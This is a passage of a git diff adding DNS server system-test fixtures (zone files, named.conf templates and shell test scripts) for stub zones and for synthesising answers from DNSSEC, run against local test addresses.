0000000..8ea1968 --- /dev/null +++ b/bin/tests/system/stub/knowngood.dig.out.rec @@ -0,0 +1,18 @@ + +; <<>> DiG 8.2 <<>> -p @10.53.0.3 data.child.example txt +; (1 server found) +;; res options: init recurs defnam dnsrch +;; got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6 +;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1 +;; QUERY SECTION: +;; data.child.example, type = TXT, class = IN + +;; ANSWER SECTION: +data.child.example. 5M IN TXT "some" "test" "data" + +;; Total query time: 8 msec +;; FROM: draco to SERVER: 10.53.0.3 +;; WHEN: Wed Jun 21 10:58:54 2000 +;; MSG SIZE sent: 36 rcvd: 97 + diff --git a/bin/tests/system/stub/ns1/named.conf.in b/bin/tests/system/stub/ns1/named.conf.in new file mode 100644 index 0000000..765cf69 --- /dev/null +++ b/bin/tests/system/stub/ns1/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + minimal-responses no; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/stub/ns1/root.db b/bin/tests/system/stub/ns1/root.db new file mode 100644 index 0000000..361f93e --- /dev/null +++ b/bin/tests/system/stub/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns3.example. +ns3.example. A 10.53.0.3 diff --git a/bin/tests/system/stub/ns2/child.example.db b/bin/tests/system/stub/ns2/child.example.db new file mode 100644 index 0000000..9b50a2a --- /dev/null +++ b/bin/tests/system/stub/ns2/child.example.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +child.example. IN SOA ns2.child.example. hostmaster.child.example. ( + 2000042795 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +child.example. NS ns2.child.example. +ns2.child.example. A 10.53.0.2 +data TXT some test data diff --git a/bin/tests/system/stub/ns2/named.conf.in b/bin/tests/system/stub/ns2/named.conf.in new file mode 100644 index 0000000..2936482 --- /dev/null +++ b/bin/tests/system/stub/ns2/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + minimal-responses no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "child.example" { + type primary; + file "child.example.db"; +}; diff --git a/bin/tests/system/stub/ns3/example.db b/bin/tests/system/stub/ns3/example.db new file mode 100644 index 0000000..4d0b3f0 --- /dev/null +++ b/bin/tests/system/stub/ns3/example.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA ns3.example. hostmaster.example. ( + 2000042795 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns3.example. +ns3.example. A 10.53.0.3 diff --git a/bin/tests/system/stub/ns3/named.conf.in b/bin/tests/system/stub/ns3/named.conf.in new file mode 100644 index 0000000..3236889 --- /dev/null +++ b/bin/tests/system/stub/ns3/named.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + minimal-responses no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "child.example" { + type stub; + file "child.example.st"; + primaries { 10.53.0.2; }; +}; diff --git a/bin/tests/system/stub/ns4/example.db b/bin/tests/system/stub/ns4/example.db new file mode 100644 index 0000000..1afe983 --- /dev/null +++ b/bin/tests/system/stub/ns4/example.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns4.example. hostmaster.example. ( + 2000042795 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ IN NS ns4 +ns4 IN A 10.53.0.4 + IN AAAA fd92:7065:b8e:ffff::4 +target IN TXT "test" diff --git a/bin/tests/system/stub/ns4/named.conf.in b/bin/tests/system/stub/ns4/named.conf.in new file mode 100644 index 0000000..7e53972 --- /dev/null +++ b/bin/tests/system/stub/ns4/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + minimal-responses yes; + dnssec-validation no; +}; + +zone "example" { + type primary; + file "example.db"; +}; diff --git a/bin/tests/system/stub/ns5/named.conf.in b/bin/tests/system/stub/ns5/named.conf.in new file mode 100644 index 0000000..8897eac --- /dev/null +++ b/bin/tests/system/stub/ns5/named.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + dnssec-validation no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type stub; + file "example.db"; + masters { 10.53.0.4 port @PORT@; }; +}; diff --git a/bin/tests/system/stub/setup.sh b/bin/tests/system/stub/setup.sh new file mode 100644 index 0000000..ccb59d4 --- /dev/null +++ b/bin/tests/system/stub/setup.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf diff --git a/bin/tests/system/stub/tests.sh b/bin/tests/system/stub/tests.sh new file mode 100644 index 0000000..6d5d110 --- /dev/null +++ b/bin/tests/system/stub/tests.sh @@ -0,0 +1,87 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp -p ${PORT}" + +status=0 +echo_i "check that the stub zone has been saved to disk" +for i in 1 2 3 4 5 6 7 8 9 20 +do + [ -f ns3/child.example.st ] && break + sleep 1 +done +[ -f ns3/child.example.st ] || { status=1; echo_i "failed"; } + +for pass in 1 2 +do + +echo_i "trying an axfr that should be denied (NOTAUTH) (pass=$pass)" +ret=0 +$DIG $DIGOPTS child.example. @10.53.0.3 axfr > dig.out.ns3 || ret=1 +grep "; Transfer failed." dig.out.ns3 > /dev/null || ret=1 +[ $ret = 0 ] || { status=1; echo_i "failed"; } + +echo_i "look for stub zone data without recursion (should not be found) (pass=$pass)" +for i in 1 2 3 4 5 6 7 8 9 +do + ret=0 + $DIG $DIGOPTS +norec data.child.example. \ + @10.53.0.3 txt > dig.out.ns3 || ret=1 + grep "status: NOERROR" dig.out.ns3 > /dev/null || ret=1 + [ $ret = 0 ] && break + sleep 1 +done +digcomp knowngood.dig.out.norec dig.out.ns3 || ret=1 +[ $ret = 0 ] || { status=1; echo_i "failed"; } + +echo_i "look for stub zone data with recursion (should be found) (pass=$pass)" +ret=0 +$DIG $DIGOPTS +noauth +noadd data.child.example. @10.53.0.3 txt > dig.out.ns3 || ret=1 +digcomp knowngood.dig.out.rec dig.out.ns3 || ret=1 +[ $ret = 0 ] || { status=1; echo_i "failed"; } + +[ $pass = 1 ] && { + echo_i "stopping stub server" + stop_server ns3 + + echo_i "re-starting stub server" + start_server --noclean --restart --port ${PORT} ns3 +} +done + +echo_i "check that glue record is correctly transferred from master when minimal-responses is on" +ret=0 +# First ensure that zone data was transfered. +for i in 1 2 3 4 5 6 7; do + [ -f ns5/example.db ] && break + sleep 1 +done + +if [ -f ns5/example.db ]; then + # If NS glue wasn't transferred, this query would fail. + $DIG $DIGOPTS +nodnssec @10.53.0.5 target.example. txt > dig.out.ns5 || ret=1 + grep 'target\.example.*TXT.*"test"' dig.out.ns5 > /dev/null || ret=1 + # Ensure both ipv4 and ipv6 glue records were transferred. + grep -E 'ns4[[:space:]]+A[[:space:]]+10.53.0.4' ns5/example.db > /dev/null || ret=1 + grep -E 'AAAA[[:space:]]+fd92:7065:b8e:ffff::4' ns5/example.db > /dev/null || ret=1 + [ $ret = 0 ] || { status=1; echo_i "failed"; } +else + status=1 + echo_i "failed: stub zone transfer failed ns4(master) <---> ns5/example.db" +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/synthfromdnssec/clean.sh b/bin/tests/system/synthfromdnssec/clean.sh new file mode 100644 index 0000000..56ec876 --- /dev/null +++ b/bin/tests/system/synthfromdnssec/clean.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +rm -f ./*/named.memstats +rm -f ./*/named.conf +rm -f ./*/named.run +rm -f ./dig.out.* +rm -f ./ns1/K*+*+*.key +rm -f ./ns1/K*+*+*.private +rm -f ./ns1/dsset-* +rm -f ./ns1/example.db +rm -f ./ns1/example.db.signed +rm -f ./ns1/dnamed.db +rm -f ./ns1/dnamed.db.signed +rm -f ./ns1/root.db +rm -f ./ns1/root.db.signed +rm -f ./ns1/trusted.conf +rm -f ./ns2/named_dump.db +rm -f ./ns*/managed-keys.bind* diff --git a/bin/tests/system/synthfromdnssec/ns1/dnamed.db.in b/bin/tests/system/synthfromdnssec/ns1/dnamed.db.in new file mode 100644 index 0000000..299adb2 --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns1/dnamed.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns1 hostmaster 1 3600 1200 604800 3600 +@ NS ns1 +ns1 A 10.53.0.1 +a A 10.53.0.1 diff --git a/bin/tests/system/synthfromdnssec/ns1/example.db.in b/bin/tests/system/synthfromdnssec/ns1/example.db.in new file mode 100644 index 0000000..90629a7 --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns1/example.db.in @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns1 hostmaster 1 3600 1200 604800 3600 +@ NS ns1 +ns1 A 10.53.0.1 +nodata TXT nodata +*.wild-a A 1.2.3.4 +*.wild-cname CNAME ns1 +dnamed DNAME dnamed. diff --git a/bin/tests/system/synthfromdnssec/ns1/named.conf.in b/bin/tests/system/synthfromdnssec/ns1/named.conf.in new file mode 100644 index 0000000..8b1954f --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns1/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +zone "example" { + type primary; + file "example.db.signed"; +}; + +zone "dnamed" { + type primary; + file "dnamed.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/synthfromdnssec/ns1/root.db.in b/bin/tests/system/synthfromdnssec/ns1/root.db.in new file mode 100644 index 0000000..ad43527 --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns1/root.db.in @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns1 hostmaster 1 3600 1200 604800 3600 +@ NS ns1 +ns1 A 10.53.0.1 +example NS ns1.example +ns1.example A 10.53.0.1 +dnamed NS ns1.dnamed +ns1.dnamed A 10.53.0.1 diff --git a/bin/tests/system/synthfromdnssec/ns1/sign.sh b/bin/tests/system/synthfromdnssec/ns1/sign.sh new file mode 100644 index 0000000..2240767 --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns1/sign.sh @@ -0,0 +1,45 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +zone=example +infile=example.db.in +zonefile=example.db + +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +cat "$infile" "$keyname.key" > "$zonefile" + +$SIGNER -P -o $zone $zonefile > /dev/null + +zone=dnamed +infile=dnamed.db.in +zonefile=dnamed.db + +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +cat "$infile" "$keyname.key" > "$zonefile" + +$SIGNER -P -o $zone $zonefile > /dev/null + +zone=. +infile=root.db.in +zonefile=root.db + +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} -n zone $zone) +cat "$infile" "$keyname.key" > "$zonefile" + +$SIGNER -P -g -o $zone $zonefile > /dev/null + +# Configure the resolving server with a static key. +keyfile_to_static_ds "$keyname" > trusted.conf diff --git a/bin/tests/system/synthfromdnssec/ns2/named.conf.in b/bin/tests/system/synthfromdnssec/ns2/named.conf.in new file mode 100644 index 0000000..8b0e8d4 --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns2/named.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "root.hints"; +}; + +include "../ns1/trusted.conf"; diff --git a/bin/tests/system/synthfromdnssec/ns2/root.hints b/bin/tests/system/synthfromdnssec/ns2/root.hints new file mode 100644 index 0000000..6b80b9e --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns2/root.hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. NS ns1 +ns1 A 10.53.0.1 diff --git a/bin/tests/system/synthfromdnssec/ns3/named.conf.in b/bin/tests/system/synthfromdnssec/ns3/named.conf.in new file mode 100644 index 0000000..a260561 --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns3/named.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "root.hints"; +}; + +zone "." { + type redirect; + file "redirect.db"; +}; + +include "../ns1/trusted.conf"; diff --git a/bin/tests/system/synthfromdnssec/ns3/redirect.db b/bin/tests/system/synthfromdnssec/ns3/redirect.db new file mode 100644 index 0000000..c529ad2 --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns3/redirect.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA ns.example.net hostmaster.example.net 0 0 0 0 0 +@ IN NS ns.example.net +; +; NS records do not need address records in this zone as it is not in the +; normal namespace. +; +*.redirect. IN A 100.100.100.2 +*.redirect. IN AAAA 2001:ffff:ffff::100.100.100.2 diff --git a/bin/tests/system/synthfromdnssec/ns3/root.hints b/bin/tests/system/synthfromdnssec/ns3/root.hints new file mode 100644 index 0000000..6b80b9e --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns3/root.hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. NS ns1 +ns1 A 10.53.0.1 diff --git a/bin/tests/system/synthfromdnssec/ns4/named.conf.in b/bin/tests/system/synthfromdnssec/ns4/named.conf.in new file mode 100644 index 0000000..9ecdd0e --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns4/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + dnssec-validation yes; + synth-from-dnssec no; +}; + +zone "." { + type hint; + file "root.hints"; +}; + +include "../ns1/trusted.conf"; diff --git a/bin/tests/system/synthfromdnssec/ns4/root.hints b/bin/tests/system/synthfromdnssec/ns4/root.hints new file mode 100644 index 0000000..6b80b9e --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns4/root.hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. NS ns1 +ns1 A 10.53.0.1 diff --git a/bin/tests/system/synthfromdnssec/ns5/named.conf.in b/bin/tests/system/synthfromdnssec/ns5/named.conf.in new file mode 100644 index 0000000..6fa0009 --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns5/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + notify no; + dnssec-validation yes; + synth-from-dnssec yes; +}; + +zone "." { + type hint; + file "root.hints"; +}; + +include "../ns1/trusted.conf"; diff --git a/bin/tests/system/synthfromdnssec/ns5/root.hints b/bin/tests/system/synthfromdnssec/ns5/root.hints new file mode 100644 index 0000000..6b80b9e --- /dev/null +++ b/bin/tests/system/synthfromdnssec/ns5/root.hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. NS ns1 +ns1 A 10.53.0.1 diff --git a/bin/tests/system/synthfromdnssec/setup.sh b/bin/tests/system/synthfromdnssec/setup.sh new file mode 100644 index 0000000..6f7bc7c --- /dev/null +++ b/bin/tests/system/synthfromdnssec/setup.sh @@ -0,0 +1,28 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf + +( + cd ns1 + $SHELL sign.sh +) diff --git a/bin/tests/system/synthfromdnssec/tests.sh b/bin/tests/system/synthfromdnssec/tests.sh new file mode 100644 index 0000000..95cfc60 --- /dev/null +++ b/bin/tests/system/synthfromdnssec/tests.sh @@ -0,0 +1,202 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +status=0 +n=1 + +rm -f dig.out.* + +dig_with_opts() { + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" +} + +for ns in 2 4 5 +do + case $ns in + 2) description="<default>";; + 4) description="no";; + 5) description="yes";; + *) exit 1;; + esac + echo_i "prime negative NXDOMAIN response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts a.example. @10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NXDOMAIN," dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "example.*3600.IN.SOA" dig.out.ns${ns}.test$n > /dev/null || ret=1 + [ $ns -eq ${ns} ] && nxdomain=dig.out.ns${ns}.test$n + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + echo_i "prime negative NODATA response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts nodata.example. @10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NOERROR," dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "example.*3600.IN.SOA" dig.out.ns${ns}.test$n > /dev/null || ret=1 + [ $ns -eq 